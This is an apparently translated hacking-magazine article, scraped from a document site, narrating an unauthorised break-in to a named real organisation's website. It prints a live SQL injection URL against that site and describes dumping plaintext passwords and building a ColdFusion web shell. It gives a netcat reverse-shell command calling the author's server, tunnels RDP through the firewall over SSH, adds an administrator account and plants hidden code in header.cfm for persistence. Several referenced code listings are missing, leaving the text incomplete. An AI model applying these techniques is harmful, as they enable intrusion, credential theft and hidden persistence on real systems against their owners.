Documente Academic
Documente Profesional
Documente Cultură
Any break-in pursues its own aim, which determines its value. It's up to you to decide whether to deface a site for the latent risqu things
lovers or to screw up another root shell. The reality is that any vulnerability in a web application poses a threat to the server. And if you
don't confine yourself to the trite and somewhat boring SQL injections so this article is right for you. The victim's address is at input, the
admin access via RDP is at output these are classics of penetration!
Having looked upon the icon of my favourite scanner I grinned and decided however not to bother the admins but to turn to the Great
Index and solve everything quietly and peacefully. So, here goes a magic phrase insite:ism.ws, then a Search button and... may we say
the thing is over?
About 10,000 results given by Google promised a laborious task. Firefox quickly acquired tabs, to which flew all sorts of quotation
marks, equations, hyphens, and other evil spirits.
http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464
Everything turned out to be so trivial, that there was no doubt about the success of the subsequent activities. The familiar blue-grey
ColdFusion error page appeared in front of me and showed the full SQL-query and DBMS type (SQL Server), and script's local address.
Generally speaking the self-descriptiveness of errors delivered by ColdFusion is just amazing, - even the full call stack is given, more than
one could ever take.
http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464+or+1= (select+@@version%2bchar(58)%2bdb_name()
%2bchar(58)%2bsystem_user%2bchar(58)%2b@@servername)--
Thus we have a not too fresh server and the RDCMS-ISM-Core base. Having looked at them closely I almost jumped up with joy: the
CMS abbreviation was clearly giving to understand that this site had been tossed off not on one's laps but some big and respectful
company had written this wonder and made lots of money. But we'll talk about it a bit later. The DB structure is next in turn.
At this stage I don't like the brainchild of Microsoft that much. Not only did the developers not find time to create a normal results paging
but they also did not manage to implement row_number Windows 2000 server. So, a cool erotic adventure using the TOP construction is
waiting for us. TOP is a trick which allows to get several first entries upon query. But it is impossible to indicate the entry to begin with,
and this is very inconvenient taking into consideration the circumstances of our unreal hacking. Of course one may follow the standard
way: to get one entry by another, memorize and omit them during the following queries. But I don't get off on this method because it is
hardly automated and the URL is not long enough so it will fail for the large databases.
That's why we'll deceive everybody. We'll sort up and down and get an acceptable paging. We'll spare the server and add the field name
checking conditions let them contain some passwords. And for the process to be ultimately cool let's first of all determine their amount
(query samples are given below). So, it's 9 of them. Let's go!
The ES_LoginInfo (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) table at once caught my eye. Well, one may rub his hands and
order a pizza. But nothing of the sort. Having determined the table structure I got the following picture. Three interesting fields were
present in the table: EntityID, Username and Password. I think there is no need to explain that I quickly made a new query series and saw
the users' data. The passwords were available and I could rush at breakneck speed to the site for the desired admin panel. By the way
when I reached the sources I could hardly understand why the passwords had not been enciphered when the CMS developers had
provided for it (SHA-1, SHA-512, MD5) and even had implemented their own algorithm (iMIS). But okay I logged in, examined the site
and returned to the dump of the database structure because 8 more tables had fields with the passwords.
Every hacker dreams of getting all the data from a database upon one query. However life sets its own conditions and as a
rule a hacker has to get information line by line. But the trouble is that each of the DBMS developers decided to worsen
the situation in his own way. So, let's talk about the schemes of data paging.
1. MySQL. It offers the following construction: limit [offset, ]rowcount. Choose rowcount (in our case it's 1)
starting with the offset row. Well done!
2. Oracle. Use the pseudo column rownum. The problem is that rownum is generated automatically and it is
impossible, for example, to set a condition like rownum=n. Such a query will return an empty result. One
cannot do without subqueries here:
3. SQL Server 2005. Here we choose a standard way: use row_number(). For example:
4. SQL Server 2000. The situation is tough here: we've got only TOP. Let's apply such a secret: if we need to
choose an entry which number is offset first let's choose TOP <offset> of entries with an ascending sort, and
then choose the first entry with a descending sort out of the returned result. As a result the last row becomes the
first one and the thing is done. But you need to remember that in order to get a correct result you should sort
all the fields in the query.
Chapter 4, or ColdFusion
I suppose everybody knows what to do with FTP. An idea to support the commands execution on the server and to get out of tight
embrace of a web application at once crosses one's mind. Obviously we need a web shell which will allow to wander about the server and
execute commands. But the trouble is that no trace of PHP or Perl at worst was detected. And it means that the moment of truth has come:
we'll have to program in ColdFusion. According to the developers this environment is very flexible and easy to master but for some
reason I don't like it at all. So, we'll Google the topic of web shells and terribly fail. All links were leading to one and the same plain piece
of code which can only execute commands. Well okay let's complement and add this and that, we only need to use the equipment. Some
time was spent on a really cool development which resulted in two offsprings. The first one shows us dirs and files, the second one listens
to us and follows our orders.
The files quickly took their places. Soon after I understood that I'd gained privileges of the SYSTEM account, and it was really cool. I just
could not rest on my laurels.
Chapter 5, or Blackle
The web shell is for sure a great thing but it is not as convenient as it may seem. We need to take the bull by its horns and get a normal
console. The Total at once applied netcat to the FTP. Netcat was launched on the Dedicated Server in promiscuous mode: "nc.exe l p
1234". The following command was executed: "cmd /c nc.exe m0r0superdedik.com 1234 e cmd". The shot was fired
and the shell was put to the consoles. Having examined the file system and launched something about ten utilities, I decided that Windows
without windows was a disaster. In 1999 there were no monads, I loathed to install anything, however for some reason the server
managing was very inconvenient. The Netstat showed port 3389, and my eyes shone with joy. The very important and needful commands
flew to the shell.
Though the mstsc command execution lead to a total failure because there arrived a message telling that the host was unavailable. NMAP
disappointed me more than the previous one, because only port 80 and port 25 turned out to be opened. The host was obviously protected
by the Firewall and port 3389 was trivially blocked. I did not want to give up, so I quickly made a list of the possible means of getting the
graphic interface:
VNC;
PPTP;
SSH.
We've done almost everything except for one small detail. That was the access to the desktop. All my cherished hopes started fading
because the shell had the SYSTEM account privileges. We would not have even tried if we had not been hackers, but, just as had been
expected, all the attempts failed. I even tried Metasploit with the windows/vncinject/reverse_tcp payload (it's a very slow thing) but the
Great Framework did not help either. The principle of the VNC deployment to the server via a non-interactive shell and having no access
to the desktop stayed unknown. In fact I even was glad why did we have to use VNC if there was RDP? We only had to get through the
Firewall.
The brilliant idea concerning PPTP is to establish a PPTP connection to our Dedicated Server and then to address the node via the
intrinsic addressing with the tunneling of the traffic through the Firewall. In Windows all the connections are adapted graphically but
there should be a way to work using a console. Start Procmon by Russinovich on the testing machine and monitor the register in a
moment when the client activates the connection to the net. The result just can not be interpreted logically because nothing interesting
happens to the register. Microsoft has surpassed itself. What was the use of creating a register if its own modules don't use it? They should
think it over in their spare time and meanwhile we found a phone book at C:\Documents and Settings\All Users\Application Data\
Microsoft\Network\Connections\Pbk\rasphone.pbk, in which actually the parameters of the connection to the Dial-up and VPN networks
were described. Establish a connection to the Dedicated Server (with the installed and adapted RRAS service) on the testing machine and
copy the received file (rasphone.pbk) to the cracked host. Then create the following command file:
We need the second line to restore the route by default after the connection so that our Dedicated Server would not undertake for the
traffic routing. I open the .bat file and was just knocked out. I would never get my hand near the connection, the Firewall seemed to block
the outcoming connections on the basis of the protocol type. Our GPE-traffic had gotten to the Blacklist as well.
We had almost given way to despair but we didn't give up. To tell the truth we'd been that dumb for a pretty long time, because we had
had to turn to SSH for help right away. By the way it's a very high-end thing and this has been more than once discussed in ][. Not only
can we get a shell but also we can invent lots of other interesting things. Our last hope was to successfully take only three steps:
I can understand a lot of things but I don't know why in the 21st century Windows does not have a built-in SSH server. Well okay, we'll
choose anyone, all the more so there are lots of them. Of course our favourite PuTTY is used as the client. But it's not just PuTTY, it's the
magic one. If you remember when addressing a new node PuTTY sincerely suggests to store the signature in the cache. Our access to the
command line is not characterized by the interactivity, so we wouldn't be able to answer this question. It means that we need the signature
to be stored automatically, but PuTTY can't do that. Having googled a little bit we found Quest PuTTY 0.60_q1.129. It's the same plus
what we need!
Check the SSH server consoles and get absolutely happy because the connection is established! Now start mstsc and connect to
localhost:3390. We see the entry window of Windows 2000. Enter the data added with the help of the net user administrator and enjoy
the graphics with the administrator's privileges. Hurrah, it's time to take a sip of a real rock'n'roll drink that is whisky and to celebrate the
success.
A piece of the code was hidden in the following file: header.cfm, which in its turn connects to almost any CMS files. Then create a simple
form, indicating any *.cfm file on the server and get a simple way of organizing RDP.
WWW
To make the vulnerability search automated you may use the following products:
INFO
The process of manual retrieving the information from the DB is tiresome and thankless. Look closely at the automation means (or
develop your own product), for example, SIPT. IMHO the program often glitches, works in a single-flow way but it copes with its task
well.
Read the full version of the article in the June issue of HACKER.
WARNING
Warning: this material is provided for informational purposes only. Neither the author nor the editorial board is responsible for your
actions!